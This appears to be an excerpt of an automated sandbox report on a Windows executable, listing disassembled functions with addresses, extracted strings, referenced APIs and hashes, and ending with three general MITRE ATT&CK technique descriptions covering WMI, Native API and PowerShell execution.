Instruction Fuzzy Hash: 0521AD7251C2508ED728EF64C051AAFB6F2BBD2304F51886DC9E997221DA3889049B4A

Function 0041417E Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

D]+\, xrefs: 004141F0

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 921c06d65bf770b8e1f325283b8f15a2443b1692f13791fa70dd71f36eb841e1
Instruction ID: a527843f7c6d39d42a0e76aaa3e64af9da3c8890365244888c69e1cdcc011a12
Opcode Fuzzy Hash: 921c06d65bf770b8e1f325283b8f15a2443b1692f13791fa70dd71f36eb841e1
Instruction Fuzzy Hash: 8511E375A00124EFCB188F84DC409BEB7B1FF9A310F29012EE59267361C7399881CB98

Function 004297C1 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

#"! , xrefs: 00429843

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID: #"!
API String ID: 2994545307-536574057
Opcode ID: 91af9bc84e1812ccc21a20bb647007ee8f33e5941f760162b02f3aa4aa9296ff
Instruction ID: cd1d4fa5a6d5aee14a5a1f3f5b9281daa537880ece2d81d772ce0bad76b54861
Opcode Fuzzy Hash: 91af9bc84e1812ccc21a20bb647007ee8f33e5941f760162b02f3aa4aa9296ff
Instruction Fuzzy Hash: 06112674B54130EAD7258F08E8C067B7361EF92304F99442FD98527612C3694C12C79E

Function 00409C3D Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

I^GD, xrefs: 00409C55

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: I^GD
API String ID: 0-1878234970
Opcode ID: 7b086f7fef59a0e027a80dd41fb79afe4a4b12b0e48b4c3565e8162069a0a408
Instruction ID: b89b783b849fb5f800db91fc1152f4c205c8b2509ccc9652bf891b79445c149b
Opcode Fuzzy Hash: 7b086f7fef59a0e027a80dd41fb79afe4a4b12b0e48b4c3565e8162069a0a408
Instruction Fuzzy Hash: E7F0B43050C7C04BEB029B3864216FBB7D0E757324F141E7CC4D6E3283C3389412860A

Function 0043E372 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

}kg, xrefs: 0043E3A2

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID: }kg
API String ID: 0-4139213958
Opcode ID: 2c0e252928e5872d85f37575665bf770b898ed14bee6f7f219f34b7b7ce903ca
Instruction ID: f0e34db99ff4968b15449ff462c62fcfb2f1ded94150262fe49d3d6444fd96e4
Opcode Fuzzy Hash: 2c0e252928e5872d85f37575665bf770b898ed14bee6f7f219f34b7b7ce903ca
Instruction Fuzzy Hash: 1AE092346482C04BE704CB289860467BBF1E78B228F142B2CD992D3791D320D8018B0D

Function 00407540 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
Instruction ID: 51c1a6252e493b95e3c98cf47f07870d118ac6fb57f8262af15e9862afe7c1b7
Opcode Fuzzy Hash: e7090ea34ac6b12813a2433899341d9b97ba95222487f940e755abaea178f4f5
Instruction Fuzzy Hash: 7F22A131A0C7118BD725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B4B

Function 00439280 Relevance: .5, Instructions: 479COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aba941982062989d4930fd2bc55cdfb59f3ec4555d8a67d0fd5d2b806ba490d1
Instruction ID: 34470fdbb189725afc3e700a8bde0e0ec9e7749f31a553f79f6f092050d3f221
Opcode Fuzzy Hash: aba941982062989d4930fd2bc55cdfb59f3ec4555d8a67d0fd5d2b806ba490d1
Instruction Fuzzy Hash: 01D15C72B083105BD724CF24CC8166BB792EBC9314F1A6A2ED99553381D779EC06C79A

Function 00416600 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8feaf9c49e79d1f1846206f3301947da26f355f2dd9f829f907b2e49edefca69
Instruction ID: 9c3641cae366a5f8b08393a179bb80b94902b3f4070d17dd0f3f7f14490260ca
Opcode Fuzzy Hash: 8feaf9c49e79d1f1846206f3301947da26f355f2dd9f829f907b2e49edefca69
Instruction Fuzzy Hash: 54B1F774A093009FD7288F14D881B7BB762EFA6328F26652DD1C613252C735DC96CB8E

Function 0043FFB0 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c476d6a8b9a2ac616dbc5c79712513fc64c34381453effd792c3636e6a5fb5d4
Instruction ID: 3c80c2fb4178644cd7440de7c3e268878fad8d318a679a30644e484febefd96a
Opcode Fuzzy Hash: c476d6a8b9a2ac616dbc5c79712513fc64c34381453effd792c3636e6a5fb5d4
Instruction Fuzzy Hash: 6D9127356042019BD715DF2CC890A2BB3F2FF99710F19856EEA859B3A1DB35DC21C74A

Function 00429B82 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 458e749ca59ab89920782cd25cf10f42a6bfba4f8469eec1dbd298ba4cd8845f
Instruction ID: 4ecc5b067d9fa75bd97263e621182eacde3ea01dae41a833ec46b2c37d84569b
Opcode Fuzzy Hash: 458e749ca59ab89920782cd25cf10f42a6bfba4f8469eec1dbd298ba4cd8845f
Instruction Fuzzy Hash: 1E61FCB160C310CBD7149F18D85222BB3F1EF96324F588A6DE4D28B791E3788D45CB9A

Function 00439000 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f99b733f7ea2d70958119783d0f0c246291e227255efc362d10ede2279f62bc9
Instruction ID: 005ec5068d2ad2a12ab892b5cae41535a95bce5180fc9816dd56f3a7bfb5dab1
Opcode Fuzzy Hash: f99b733f7ea2d70958119783d0f0c246291e227255efc362d10ede2279f62bc9
Instruction Fuzzy Hash: DB519575A08304ABE710DF28DC84B7BB7A6EB8A300F15983DF58893241D779DD09D79A

Function 0042A9A0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66005e03aa27836dd650f0e005e5dffc4785e5d69e6775a9d1cdd3b8174d98a4
Instruction ID: 9150d0f941fbdf8258f6ca472fc53c5e8d28733224733d753e598c910154a09b
Opcode Fuzzy Hash: 66005e03aa27836dd650f0e005e5dffc4785e5d69e6775a9d1cdd3b8174d98a4
Instruction Fuzzy Hash: E471E5317087604BC7249E2DA98022BB7D2AF85730F698B1EECF58B3D5D2389C55874B

Function 00439760 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a208bad0c29e297a52e3fc43ad2c78e123c5e744c86adad651b4002d5e1a38cd
Instruction ID: 45821c036e835cf6da8ae56ea9d3604fa588e6dfa63f9076ccedc3b1d8b098a4
Opcode Fuzzy Hash: a208bad0c29e297a52e3fc43ad2c78e123c5e744c86adad651b4002d5e1a38cd
Instruction Fuzzy Hash: DF4148B2A043045BE718AE14DC40B7BB795EFCA308F15183EF98593251D779EC09879A

Function 00408820 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9c263ec52d77fd7c2a5088dd199313b2c99a9bdb3e25d913d27fe764585634
Instruction ID: a10a9ace44cc20276a251417395e7061845d4154c0b41375cde5f303133b12a8
Opcode Fuzzy Hash: 5a9c263ec52d77fd7c2a5088dd199313b2c99a9bdb3e25d913d27fe764585634
Instruction Fuzzy Hash: 32410433E119188BEB14CE69DD443DA7393ABD8324F2ACA39DD54EB3C0DD39AD118684

Function 0040D94C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c667900365cb102a5f9e816bc2c4c645270936ca9d4c13f96db9a820de218ad3
Instruction ID: 06f35b9f8222a1c7a2136048da360587426c84a327200a8c1a6c2b2bf15167cf
Opcode Fuzzy Hash: c667900365cb102a5f9e816bc2c4c645270936ca9d4c13f96db9a820de218ad3
Instruction Fuzzy Hash: 6F21D6B8B086D08BD324CB18D8417AFB7E2ABCA350F18997ED5C5E3385C6749845874A

Function 00416FC1 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 88ae77e715dea2520c01b77080bad9269850ffab6a834d883a8b359466ba3717
Instruction ID: 8e7edb28edaa743d1e8a2ca10ff073165bcc5d1f5d1422abfeafcfa1e8691f8d
Opcode Fuzzy Hash: 88ae77e715dea2520c01b77080bad9269850ffab6a834d883a8b359466ba3717
Instruction Fuzzy Hash: 38113A7514C200ABDB158B14D851EBB7BA6EF49328F15052EE1C613223C33ADDA3CB9E

Function 00417097 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcdc94542ef3b7bfb0eebc177f98e44741ab56a92dbe6d81632f36d099ef8261
Instruction ID: ac4e4c7110d06ab024df55a5fde5a5183d459c2b3bfeb81cb117c0f377f141fc
Opcode Fuzzy Hash: dcdc94542ef3b7bfb0eebc177f98e44741ab56a92dbe6d81632f36d099ef8261
Instruction Fuzzy Hash: 2111B63420C3408BD714CB14D491AABBBA19F8A338F25152ED5CA53212C739DC97CF8E

Function 0041613C Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b50797ff15c5e92880f4ca7903d055acce11650d0a9e799ea604352093fbbbad
Instruction ID: 718830ab9cefd92451f733bafe5385d49c8e0263c7cb65eddacdf53f8aeae9c9
Opcode Fuzzy Hash: b50797ff15c5e92880f4ca7903d055acce11650d0a9e799ea604352093fbbbad
Instruction Fuzzy Hash: E301FE74708300AFD3208B14D941BA7B7F5ABC6355F15552DD0C893213CA35D891CB5E

Function 00435880 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5b2b74ac1a3ba5c45c454e7f1da22ae82971d98106045a86a0c66dac7f734a9c
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 1311E533A055D44EC3168D3C8400566BFE30EA7235F69939AF4F89B2D6D6268D8E8359

Function 0042A900 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cbefc0aaaae31065107afbd05f1856c50cdddf71bb63b496adc64cf0b6f71d7
Instruction ID: 152272b00c312c91414574f230f3ba22e0f118dcefba2f606aabb1c3d722775f
Opcode Fuzzy Hash: 0cbefc0aaaae31065107afbd05f1856c50cdddf71bb63b496adc64cf0b6f71d7
Instruction Fuzzy Hash: 1601D8F170071147E7209E53A5C0737B2A86F81718F1A483EDC4867341DB7DEC68C69A

Function 004160AC Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11e4aa08000d0ffc636797053068e18c217fbc36fff64dd0dd21577e38f4c07c
Instruction ID: 35524161cfba80d1c3cdc7199ce4602e1dee8a575dc7be6b2fece3da34c89176
Opcode Fuzzy Hash: 11e4aa08000d0ffc636797053068e18c217fbc36fff64dd0dd21577e38f4c07c
Instruction Fuzzy Hash: 410149746042109BEB24CB149D51B7B77E1EB8B325F2A183DE1C6A3193C624E8D1C70E

Function 0042BD50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d2bb327e109cc06b0f5bcee56e9a19d3659d92beffae06204f8a55db50f8f19
Instruction ID: c6917e7f57e7423663601ffabffa0dc2e4be31a6bfb33ddc875298ad7f9c3d88
Opcode Fuzzy Hash: 7d2bb327e109cc06b0f5bcee56e9a19d3659d92beffae06204f8a55db50f8f19
Instruction Fuzzy Hash: 9DF0EC147982960BE318973864B5BFFA7D1D783728F541B3CC1D7D3693E6158803464D

Function 0040BF63 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6810b6d46a952c214fc29e8ff1f8a53579113133959a9dcb001a82a5e45cd878
Instruction ID: fb7f1b7316cbe5b4fc96c526ad714eb641262e3d4644acd51d98e3cb9073cb97
Opcode Fuzzy Hash: 6810b6d46a952c214fc29e8ff1f8a53579113133959a9dcb001a82a5e45cd878
Instruction Fuzzy Hash: F3D05BDEE8180847D69C9721FC1376AB265A39515CB19743E980FD3717D92CD255404D

Function 004322F6 Relevance: 29.9, APIs: 1, Strings: 16, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00432300

Strings

r, xrefs: 004323C3
/, xrefs: 0043243B
n, xrefs: 004323D7
6, xrefs: 00432323
!, xrefs: 00432373
e, xrefs: 0043241D
0, xrefs: 004324EB
d, xrefs: 00432387
c, xrefs: 004323CD
*, xrefs: 00432427
Z, xrefs: 00432431
`, xrefs: 00432391
9, xrefs: 0043235F
*, xrefs: 00432337
*, xrefs: 00432341
P, xrefs: 004323A5

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: AllocString
String ID: !$*$*$*$/$0$6$9$P$Z$`$c$d$e$n$r
API String ID: 2525500382-3262402241
Opcode ID: cb4a5adb662cf75e44ad72f0b6ea7189be423dd3c01865b8ebb67128178dc031
Instruction ID: dddf787bba59d8c4edd24aeb07a3b0fdd7e4352279f3d81e3e267e0d9ab3230f
Opcode Fuzzy Hash: cb4a5adb662cf75e44ad72f0b6ea7189be423dd3c01865b8ebb67128178dc031
Instruction Fuzzy Hash: 1F61D32140CBC28AD322C67C884864FFFE15BE7224F184B9DE5F44B3E6C6A58546CB67

Function 00432D03 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 89COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00432D19
VariantInit.OLEAUT32 ref: 00432D2C

Strings

a, xrefs: 00432D81
{, xrefs: 00432D63
i, xrefs: 00432DA9
m, xrefs: 00432D95
c, xrefs: 00432D8B
k, xrefs: 00432DB3
e, xrefs: 00432D6D
y, xrefs: 00432D59
o, xrefs: 00432D9F
g, xrefs: 00432D77

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Variant$ClearInit
String ID: a$c$e$g$i$k$m$o$y${
API String ID: 2610073882-4285228952
Opcode ID: 09d63eaadca6f4b89d631470797b97cd6c8383af6786a790d5847a1899f96b37
Instruction ID: e40e0d38ba16d3728829d0489d928af8b97e0180d5aeebb0aaa979edfa8964cd
Opcode Fuzzy Hash: 09d63eaadca6f4b89d631470797b97cd6c8383af6786a790d5847a1899f96b37
Instruction Fuzzy Hash: 7041297010C7C18EC3259B3C988824EBFD16B9A328F480B5DF0E98B3D2D6B58545C767

Function 00431C0F Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 87COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431C19
VariantInit.OLEAUT32 ref: 00431C2C

Strings

c, xrefs: 00431C8B
g, xrefs: 00431C77
e, xrefs: 00431C6D
o, xrefs: 00431C9F
{, xrefs: 00431C63
k, xrefs: 00431CB3
i, xrefs: 00431CA9
y, xrefs: 00431C59
a, xrefs: 00431C81
m, xrefs: 00431C95

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: Variant$ClearInit
String ID: a$c$e$g$i$k$m$o$y${
API String ID: 2610073882-4285228952
Opcode ID: 262b2ab90f2609da02b6e1de10f0e9f2ddd1c22704db85f28f298a0afd4d4ca6
Instruction ID: a0fd58e4d8ccd35e6e9a63c0debc485f416bf03bc3de50930b83af045deb2cf2
Opcode Fuzzy Hash: 262b2ab90f2609da02b6e1de10f0e9f2ddd1c22704db85f28f298a0afd4d4ca6
Instruction Fuzzy Hash: 2141573110C3C18EC3259B38948824BBFD16BE6328F584B5DE4E94B3E2D7B58506C767

Function 0042838E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 0042846B

Strings

G, xrefs: 004283C6
F_, xrefs: 004283CE
rE, xrefs: 004283D6

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: F_$G$rE
API String ID: 237503144-660961108
Opcode ID: f1ce4c99dfae7e1fa712e5bb761be120e16775f2929245c226ba3b30bfe50682
Instruction ID: 5bd656ceda4e220c54c027ba9d4c0afb54d02fb5a392a4f5fdf64161cfeee483
Opcode Fuzzy Hash: f1ce4c99dfae7e1fa712e5bb761be120e16775f2929245c226ba3b30bfe50682
Instruction Fuzzy Hash: 6231ABB520D3508FD328CF65D99175FBBE2EBC5718F088A2CE5964B381C7B498068B4A

Function 00428B70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428C06

Strings

w, xrefs: 00428B92
{y, xrefs: 00428B82

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: w${y
API String ID: 237503144-4287220308
Opcode ID: 4c2a1f90097c24bef0d4c1f97d8d8bac896b712e4a17a7f0d88e918e43a00912
Instruction ID: 15914a7c29113598c32f40c9e19fdd9eb769565e280641073aa5d13e0b81bd31
Opcode Fuzzy Hash: 4c2a1f90097c24bef0d4c1f97d8d8bac896b712e4a17a7f0d88e918e43a00912
Instruction Fuzzy Hash: B7416C767497118BD3208F68BC8176FB7D1EBC1310F25453EE899C7280EE79D90A479A

Function 00423070 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00423108

Strings

fk&,, xrefs: 00423116
jk&,, xrefs: 00423157

Memory Dump Source

Source File: 00000005.00000002.3283408139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.3283408139.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_0x001f00000004676d-1858.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: fk&,$jk&,
API String ID: 237503144-1303170083
Opcode ID: 44ff3911efd333fc3ee3f7bfdc9ec8d6fac3558c98616d764f91e1e6d4c19134
Instruction ID: c770f829dce2bd5a4f65e039cff7956c7abee7ac5692e81afd1c73524adf907b
Opcode Fuzzy Hash: 44ff3911efd333fc3ee3f7bfdc9ec8d6fac3558c98616d764f91e1e6d4c19134
Instruction Fuzzy Hash: B121C13524C3509BE314CF25D881B5F7BA1EBC1714F24CA2CE4D59B6C1DBB9890ACB96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

